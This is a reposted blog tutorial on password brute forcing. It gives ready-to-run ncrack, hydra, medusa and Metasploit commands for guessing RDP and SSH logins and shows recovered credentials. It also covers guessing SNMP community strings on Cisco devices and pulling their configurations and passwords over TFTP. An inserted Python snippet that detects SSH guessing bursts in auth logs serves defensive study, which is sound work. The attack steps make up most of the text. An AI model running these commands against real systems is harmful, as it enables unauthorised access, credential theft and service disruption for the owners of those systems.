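Brute-force tools

You need a strong wordlist, but if it is too large for the computer to index, it is useless as well.

Cracking a password comes down to luck: with good luck it takes a few seconds or minutes, and with bad luck it is normal to get nowhere after a day or two. You just have to keep trying.

Brute forcing loads the machine's CPU and may lead to a denial of service. Password logins may also end up being refused.

Tool: https://github.com/tearsecurity/leviathan

Leviathan is a mass audit toolkit with wide-ranging service discovery, brute force, SQL injection detection and the ability to run custom exploits. It consists of open-source tools such as masscan, ncrack and dsss, and gives you the flexibility to use them in combination.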

_________________________________________________________

The official projects all provide demos and documentation!

ncrack : https://nmap.org/ncrack/man.html

Brute forcing an RDP account with ncrack

ncrack -u Administrator -P /root/shellWork/UserAndPassword/password.pwd -p 3389 192.168.2.110 

Discovered credentials for ms-wbt-server on 192.168.2.110 3389/tcp:
192.168.2.110 3389/tcp ms-wbt-server: 'Administrator' '000000'


rdesktop 192.168.2.110
ncrack -p 22 --user username -P /root/shellWork/UserAndPassword/password.txt IP

Hydra : https://github.com/vanhauser-thc/thc-hydra

hydra -l root -P /root/shellWork/UserAndPassword/password.txt 192.168.2.111 ssh

medusa : https://github.com/jmk-foofus/medusa

medusa -u msfadmin -P /root/shellWork/UserAndPassword/password.txt -h 192.168.2.111 -M ssh

Metasploit:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > show options 


msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/shellWork/UserAndPassword/user.usr
USER_FILE => /root/shellWork/UserAndPassword/username.txt
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/shellWork/UserAndPassword/password.txt
PASS_FILE => /root/shellWork/UserAndPassword/password.txt
msf auxiliary(scanner/ssh/ssh_login) > set THREADS 4
THREADS => 4
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.2.111
RHOSTS => 192.168.2.111
msf auxiliary(scanner/ssh/ssh_login) > exploit
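
Seen from the target side, the SSH guessing runs above leave a clear trail in the sshd log. The following added example (not part of the original post) flags a source with a burst of failed passwords and any login that succeeds after the burst; the log lines are constructed, and the threshold, window and year are assumed defaults.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed OpenSSH auth-log sample (not from the page): one noisy source, one normal user.
SAMPLE_LOG = """\
Aug 30 10:00:01 srv sshd[2101]: Failed password for root from 192.168.2.50 port 40001 ssh2
Aug 30 10:00:02 srv sshd[2102]: Failed password for root from 192.168.2.50 port 40002 ssh2
Aug 30 10:00:03 srv sshd[2103]: Failed password for invalid user admin from 192.168.2.50 port 40003 ssh2
Aug 30 10:00:04 srv sshd[2104]: Failed password for msfadmin from 192.168.2.50 port 40004 ssh2
Aug 30 10:00:05 srv sshd[2105]: Failed password for msfadmin from 192.168.2.50 port 40005 ssh2
Aug 30 10:00:06 srv sshd[2106]: Accepted password for msfadmin from 192.168.2.50 port 40006 ssh2
Aug 30 10:05:10 srv sshd[2200]: Failed password for alice from 192.168.2.77 port 51000 ssh2
Aug 30 10:05:20 srv sshd[2201]: Accepted password for alice from 192.168.2.77 port 51001 ssh2
Aug 30 10:06:00 srv sshd[2202]: Connection closed by 192.168.2.77 port 51001
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2018):
    """Per source IP: total failures, whether `threshold` failures fell inside
    `window`, and which users logged in successfully after such a burst."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue              # not a password-auth result line
        # Syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        entry = report.setdefault(
            m["ip"], {"failures": 0, "burst": False, "success_after_burst": []})
        if m["result"] == "Failed":
            entry["failures"] += 1
            q = recent[m["ip"]]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                entry["burst"] = True
        elif entry["burst"]:
            # A success right after a guessing burst: treat the account as compromised.
            entry["success_after_burst"].append(m["user"])
    return report
```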

_____________________________________________________________________________________________________

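Guessing community strings on Cisco devices:

onesixtyone : https://github.com/trailofbits/onesixtyone

SNMP is a stateless, datagram-oriented protocol. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

SNMP protocol: https://blog.csdn.net/shanzhizi/article/details/11606767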

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt IP # onesixtyone can find the public and private community strings

# Write the community strings that were found to a file
echo -e "public\nsecret\n" > text.txt

Cracking with Metasploit:

msf > search snmp_login

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/scanner/snmp/snmp_login                   normal  SNMP Community Login Scanner


msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(scanner/snmp/snmp_login) > show options 

msf auxiliary(scanner/snmp/snmp_login) > set PASS_FILE text.txt
PASS_FILE => text.txt
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS IP
RHOSTS => IP
msf auxiliary(scanner/snmp/snmp_login) > exploit 
msf auxiliary(scanner/snmp/snmp_login) > creds # check whether the community string is read-only or read-write

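SNMP and TFTP are the two protocols most commonly used when working with Cisco devices. SNMP can get and set device information. TFTP is one of the ways a Cisco device loads configuration files, new images and other information onto a switch or router. A Cisco device can act as a TFTP server, allowing other operating systems to load configuration information and configuration files from it.

SNMP can be used to obtain a Cisco device's configuration information and running configuration, and a new configuration can be pushed back to the server over TFTP.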

 

msf > use auxiliary/scanner/snmp/cisco_config_tftp 
msf auxiliary(scanner/snmp/cisco_config_tftp) > show options 

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port (UDP)
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(scanner/snmp/cisco_config_tftp) > 

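This module can send SNMP write commands to the device and can also download the configuration file. On success, msf starts a TFTP service and has the device connect to the service that msf started.

msf parses the file and obtains the passwords.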

Reposted from blog.csdn.net/freegotocpp/article/details/82216254